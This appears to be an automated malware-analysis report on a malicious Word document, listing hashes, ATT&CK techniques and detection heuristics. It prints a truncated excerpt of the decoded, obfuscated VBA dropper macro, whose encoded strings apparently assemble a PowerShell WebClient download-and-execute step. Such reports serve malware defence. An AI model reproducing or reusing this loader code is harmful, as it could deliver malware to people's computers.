Office (OLE) malware analysis — malicious · e1f775bb2eb41aed

MALICIOUS

Office (OLE)

111.5 KB Created: 2018-02-16 21:00:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: 993fd58236440b77f5d43daf7403eca3 SHA-1: 9a48b0c53057a1cb4dddf5cff59edbb6c001abe8 SHA-256: e1f775bb2eb41aed007394ab8fc5f68b878c5017037d28653678279bf347e8b1

302 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing heavily obfuscated VBA macros. Critical heuristics indicate the presence of an auto-executing loader that uses Shell() calls to execute a payload. The ClamAV detection name 'Doc.Dropper.Agent' further suggests its role as a dropper. No specific family could be identified due to the obfuscation.

Heuristics 8

ClamAV: Doc.Dropper.Agent-6450700-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6450700-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 33423 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	33423 bytes
SHA-256: `4aef35ea14d2bfc6e9ca39f3b61b722f5557535e881ade704c37edb6a6dfe4a8`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "TunqTAItS" Function pquJzupaDTsI() On Error Resume Next NHQHPkjZ = 1636598 / ChrB(9574479 + CBool(4592213)) / 8534709 * HsiVRjzGaI * (bfKwCXiQzVJiu / mvjHQU / 7237756 - CByte(7763763) / 4353702 - LIzPrPpNfZtCtI) mzDAYz = 6836373 / ChrB(7108267 + CBool(3019220)) / 1324748 * GzJkMfkOwJoHn * (NluZSZ / fwCUPkCaYjE / 5913015 - CByte(9044098) / 3152209 - BXkkGBrDrSGtjX) UWaPotuuzkH = 7874923 / ChrB(2116384 + CBool(9391892)) / 6404282 * aBGQzu * (nadjcssNjXp / TiosLBJrVDj / 4038903 - CByte(1489090) / 9508733 - pwuGnpXNQZHp) sjVBP = (NwnoSUhEFm) + ?HIUbhhuGKUsad("AKRfTKaHiiftUTzqt3nt;yL3+yL3Hm3NSyL3+yL3B5EH+5EH =yL3uwN+uwN+yL3 HmuwN+uwNyL3+yL33n5EH+5EHsyjPrSqzsPMvzmi", 18, 75) MNIjDd = 6002550 / ChrB(1296283 + CBool(558438)) / 2861397 * QBsvVXTELvqD * (RztjKCpz / wnKdZRfKHzDwB / 3841023 - CByte(4083684) / 3600342 - OpqDtL) WvrdHmRn = 1873067 / ChrB(3880740 + CBool(4857600)) / 1822040 * vwzYpYDFkrz * (YBotz / QfYQEoAI / 7831678 - CByte(976383) / 5254876 - JAHwO) lldMmczZW = 2114789 / ChrB(9596343 + CBool(5955585)) / 1866662 * QPhORnRBFS * (DIiKfrL / jjwijhztc / 7409567 - CByte(5608715) / 9071953 - HnOIiqXM) QfaAT = (mIvOoCMjqIc) + ?HIUbhhuGKUsad("ucOJqziEUstem.Net.WeyL'+'3+yL3bCliyL3+yL3eyL3'+'+yLsivOwLcuvAiNhURN", 10, 42) rUIPPb = 3034483 / ChrB(247847 + CBool(9396776)) / 128741 * LpzwVtbFQqDJ * (NduwXk / DSBXXl / 81403 - CByte(2013526) / 4227226 - lmTzunw) BuicbSzmqMz = 3784440 / ChrB(2929889 + CBool(921169)) / 1025682 * dzMSOcS * (TdMqlsoZak / QjCEQqLSpwcIf / 853217 - CByte(8042682) / 7956149 - LEWYs) HZdORmzoIi = 8983264 / ChrB(8897813 + CBool(1473190)) / 4991122 * LBzWsiLoda * (vcCJcdqUjmvDm / VOUYpIz / 8278057 - CByte(2661918) / 50688 - qbjiTQMO) kJOYUXNU = (SlwjTtpPcXqvV) + ?HIUbhhuGKUsad("IBwGDhpkQmKAIXEMTyL3yL3) ((yL3Hm3nsadasyL35EH+5EH+yL3d yL3+yL3=yL5hRLw", 18, 49) WsjTTaaMd = 4403309 / ChrB(3122242 + CBool(8295093)) / 3068833 * SzEOCslBGqMW * (ofwtuFIXEKz / kSdTMNcAX / 9301388 - CByte(1819801) / 2303238 - SWiQwwj) bscFRZzQLwp = 3723652 / ChrB(6284704 + CBool(1834349)) / 6423668 * dWlHQN * (GqSZIhtckWLs / mjcjdHIOR / 895450 - CByte(669482) / 1747895 - KjrrsHjWFWzwVi) plKLZp = 506088 / ChrB(3722917 + CBool(9257588)) / 9413110 * RLWwuBdJE * (omOQNXKls / EJzjJcmIZF / 9027956 - CByte(4089241) / 1482339 - sknmzpOwizQ) jwwVuMoQ = (mtpQwNH) + ?HIUbhhuGKUsad("uzWoaDofU'+'98+[chAR]70+[chAR]86),5EH5hY5EH).REplACE(([cuwN+uwNhAR]HzRKpdFbTijLhWZaOaMoKsN", 10, 58) mCzhaH = 7600817 / ChrB(569038 + CBool(3031583)) / 1189654 * CQZqGzNNMRo * (kZzzfasO / TzFFHfbVuA / 586698 - CByte(2026116) / 5406002 - ZNbIVV) IVOtYlarv = 7308868 / ChrB(3303519 + CBool(338794)) / 7990495 * nDlXIcW * (AiSTlwUmsRRlH / PXlDRX / 8566380 - CByte(8602027) / 514523 - QqTcpzmYjSbaHu) BVADGoi = 8153572 / ChrB(1979804 + CBool(324987)) / 6827414 * zkDHfnOlEKzzH * (XCuirwuftFo / oQrNHVJwDLM / 6820690 - CByte(7727368) / 7881031 - LiNjTTvjrw) RIaqKzSLnmJ = (SPVjzdTijYcjX) + ?HIUbhhuGKUsad("KkilL3+yL3adyL3+yL3ayL3+yL3sd'+'.yL3+yL3neyL3+yL3xyL3+uwN+uwNyL3t(10000, 282133);yL3+'+'yL3HyL3+yL3m3ADyL3+yL3CX = uyL3+yL3MA htyL3+yL3dhXSRooZzilckq", 5, 131) jEdUi = 6069918 / ChrB(4928492 + CBool(4021932)) / 2607460 * hzRbLWzjUOQpq * (RqKBdKTXBl / HRPXLYwlEQvZ / 5167757 - CByte(3709118) / 3843516 - tsbuAM) zSVhaflTco = 8413575 / ChrB(3486423 + CBool(1184114)) / 3984043 * rDaJzjmDE * (MIqSElMVRji / BZiaqo / 9132953 - CByte(4942084) / 9559910 - qAGhiGzt) kspXsJ = 7671834 / ChrB(3002691 + CBool(2924455)) / 4801185 * jkcwaiwpkpi * (AfXpw / fmvRqM / 4348091 - CByte(1446871) / 1202670 - XwSuctupO) jNptk = (CiqJcMqKqCVjz) + ?HIUbhhuGKUsad("vzrE(([ChAR]117+[ChAR]119jGzOichPvd", 4, 22) pmJjYju = 4717647 / ChrB(4606296 + CBool(3391746)) / 7819628 * oZHkhaHnk * (TLfnqiiwTHLJ / HcvwRCWdKRnjG / 4184855 - CByte(8277865) / 8582025 - hUzBSGObjo) pCAUwaK = 8798826 / C ... (truncated)

SHA-256: 4aef35ea14d2bfc6e9ca39f3b61b722f5557535e881ade704c37edb6a6dfe4a8

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "TunqTAItS"
Function pquJzupaDTsI()
On Error Resume Next
NHQHPkjZ = 1636598 / ChrB(9574479 + CBool(4592213)) / 8534709 * HsiVRjzGaI * (bfKwCXiQzVJiu / mvjHQU / 7237756 - CByte(7763763) / 4353702 - LIzPrPpNfZtCtI)
mzDAYz = 6836373 / ChrB(7108267 + CBool(3019220)) / 1324748 * GzJkMfkOwJoHn * (NluZSZ / fwCUPkCaYjE / 5913015 - CByte(9044098) / 3152209 - BXkkGBrDrSGtjX)
UWaPotuuzkH = 7874923 / ChrB(2116384 + CBool(9391892)) / 6404282 * aBGQzu * (nadjcssNjXp / TiosLBJrVDj / 4038903 - CByte(1489090) / 9508733 - pwuGnpXNQZHp)
sjVBP = (NwnoSUhEFm) + ?HIUbhhuGKUsad("AKRfTKaHiiftUTzqt3nt;yL3+yL3Hm3NSyL3+yL3B5EH+5EH =yL3uwN+uwN+yL3 HmuwN+uwNyL3+yL33n5EH+5EHsyjPrSqzsPMvzmi", 18, 75)
MNIjDd = 6002550 / ChrB(1296283 + CBool(558438)) / 2861397 * QBsvVXTELvqD * (RztjKCpz / wnKdZRfKHzDwB / 3841023 - CByte(4083684) / 3600342 - OpqDtL)
WvrdHmRn = 1873067 / ChrB(3880740 + CBool(4857600)) / 1822040 * vwzYpYDFkrz * (YBotz / QfYQEoAI / 7831678 - CByte(976383) / 5254876 - JAHwO)
lldMmczZW = 2114789 / ChrB(9596343 + CBool(5955585)) / 1866662 * QPhORnRBFS * (DIiKfrL / jjwijhztc / 7409567 - CByte(5608715) / 9071953 - HnOIiqXM)
QfaAT = (mIvOoCMjqIc) + ?HIUbhhuGKUsad("ucOJqziEUstem.Net.WeyL'+'3+yL3bCliyL3+yL3eyL3'+'+yLsivOwLcuvAiNhURN", 10, 42)
rUIPPb = 3034483 / ChrB(247847 + CBool(9396776)) / 128741 * LpzwVtbFQqDJ * (NduwXk / DSBXXl / 81403 - CByte(2013526) / 4227226 - lmTzunw)
BuicbSzmqMz = 3784440 / ChrB(2929889 + CBool(921169)) / 1025682 * dzMSOcS * (TdMqlsoZak / QjCEQqLSpwcIf / 853217 - CByte(8042682) / 7956149 - LEWYs)
HZdORmzoIi = 8983264 / ChrB(8897813 + CBool(1473190)) / 4991122 * LBzWsiLoda * (vcCJcdqUjmvDm / VOUYpIz / 8278057 - CByte(2661918) / 50688 - qbjiTQMO)
kJOYUXNU = (SlwjTtpPcXqvV) + ?HIUbhhuGKUsad("IBwGDhpkQmKAIXEMTyL3yL3) ((yL3Hm3nsadasyL35EH+5EH+yL3d yL3+yL3=yL5hRLw", 18, 49)
WsjTTaaMd = 4403309 / ChrB(3122242 + CBool(8295093)) / 3068833 * SzEOCslBGqMW * (ofwtuFIXEKz / kSdTMNcAX / 9301388 - CByte(1819801) / 2303238 - SWiQwwj)
bscFRZzQLwp = 3723652 / ChrB(6284704 + CBool(1834349)) / 6423668 * dWlHQN * (GqSZIhtckWLs / mjcjdHIOR / 895450 - CByte(669482) / 1747895 - KjrrsHjWFWzwVi)
plKLZp = 506088 / ChrB(3722917 + CBool(9257588)) / 9413110 * RLWwuBdJE * (omOQNXKls / EJzjJcmIZF / 9027956 - CByte(4089241) / 1482339 - sknmzpOwizQ)
jwwVuMoQ = (mtpQwNH) + ?HIUbhhuGKUsad("uzWoaDofU'+'98+[chAR]70+[chAR]86),5EH5hY5EH).REplACE(([cuwN+uwNhAR]HzRKpdFbTijLhWZaOaMoKsN", 10, 58)
mCzhaH = 7600817 / ChrB(569038 + CBool(3031583)) / 1189654 * CQZqGzNNMRo * (kZzzfasO / TzFFHfbVuA / 586698 - CByte(2026116) / 5406002 - ZNbIVV)
IVOtYlarv = 7308868 / ChrB(3303519 + CBool(338794)) / 7990495 * nDlXIcW * (AiSTlwUmsRRlH / PXlDRX / 8566380 - CByte(8602027) / 514523 - QqTcpzmYjSbaHu)
BVADGoi = 8153572 / ChrB(1979804 + CBool(324987)) / 6827414 * zkDHfnOlEKzzH * (XCuirwuftFo / oQrNHVJwDLM / 6820690 - CByte(7727368) / 7881031 - LiNjTTvjrw)
RIaqKzSLnmJ = (SPVjzdTijYcjX) + ?HIUbhhuGKUsad("KkilL3+yL3adyL3+yL3ayL3+yL3sd'+'.yL3+yL3neyL3+yL3xyL3+uwN+uwNyL3t(10000, 282133);yL3+'+'yL3HyL3+yL3m3ADyL3+yL3CX = uyL3+yL3MA htyL3+yL3dhXSRooZzilckq", 5, 131)
jEdUi = 6069918 / ChrB(4928492 + CBool(4021932)) / 2607460 * hzRbLWzjUOQpq * (RqKBdKTXBl / HRPXLYwlEQvZ / 5167757 - CByte(3709118) / 3843516 - tsbuAM)
zSVhaflTco = 8413575 / ChrB(3486423 + CBool(1184114)) / 3984043 * rDaJzjmDE * (MIqSElMVRji / BZiaqo / 9132953 - CByte(4942084) / 9559910 - qAGhiGzt)
kspXsJ = 7671834 / ChrB(3002691 + CBool(2924455)) / 4801185 * jkcwaiwpkpi * (AfXpw / fmvRqM / 4348091 - CByte(1446871) / 1202670 - XwSuctupO)
jNptk = (CiqJcMqKqCVjz) + ?HIUbhhuGKUsad("vzrE(([ChAR]117+[ChAR]119jGzOichPvd", 4, 22)
pmJjYju = 4717647 / ChrB(4606296 + CBool(3391746)) / 7819628 * oZHkhaHnk * (TLfnqiiwTHLJ / HcvwRCWdKRnjG / 4184855 - CByte(8277865) / 8582025 - hUzBSGObjo)
pCAUwaK = 8798826 / C
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.